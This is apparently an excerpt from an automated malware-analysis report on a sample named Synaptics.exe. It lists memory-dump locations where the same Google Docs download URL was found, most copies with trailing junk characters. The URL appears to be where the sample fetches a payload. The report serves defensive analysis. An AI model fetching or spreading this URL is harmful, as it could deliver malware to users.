                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadel
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelleA
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadelleme
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadem4
                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademC
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademe
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloademh
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden0
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaden8
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenH
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenet9
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenetl
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniy
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeniyo
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadenl
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadentHt
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadep
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadepG
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloader
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet$
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3014009313.000000001D570000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadetlen
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadet~
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052DA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf
                                Source: Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadform-
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984057257.000000000E8B7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg;
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgl;
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo(;
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgo;%
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgoog
                                Source: Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988243249.000000000EB20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh-ua-
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadho
                                Source: Synaptics.exe, 00000002.00000002.3020449000.000000001D8B9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.000000000532C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3012495090.000000001D481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000740F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi08
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiV
                                Source: Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiao$#
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadic
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadid.c
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadights
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadin
                                Source: Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiveUn
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiy
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyd
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyh
                                Source: Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3016366426.000000001D63F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3069143286.000000003AF99000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyt
                                Source: Synaptics.exe, 00000002.00000002.2983126011.000000000E802000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj/
                                Source: Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj8
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2984970329.000000000E97A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.00000000073C1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                                Source: Synaptics.exe, 00000002.00000002.3083411511.000000003B54D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadklB
                                Source: Synaptics.exe, 00000002.00000002.2953651739.000000000060F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2988482913.000000000EB96000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1FC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3009502535.000000001D2E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3073527986.000000003B1C7000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000748D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3021331514.000000001D91B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3077639547.000000003B364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadl
                                Source: Synaptics.exe, 00000002.00000002.2959950848.000000000532C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadlRD
                                Source: Synaptics.exe, 00000002.00000002.2959950848.00000000052EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadla
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA74000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2987137528.000000000EA94000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022296271.000000001D994000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.2966481395.000000000736E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3015177865.000000001D5B6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3011336927.000000001D423000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.3010343676.000000001D334000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle
                                Source: Synaptics.exe, 00000002.00000002.3022661830.000000001DA08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadle?
                                Source: Synaptics.exe, 00000002.00000002.3077223915.000000003B318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadleD
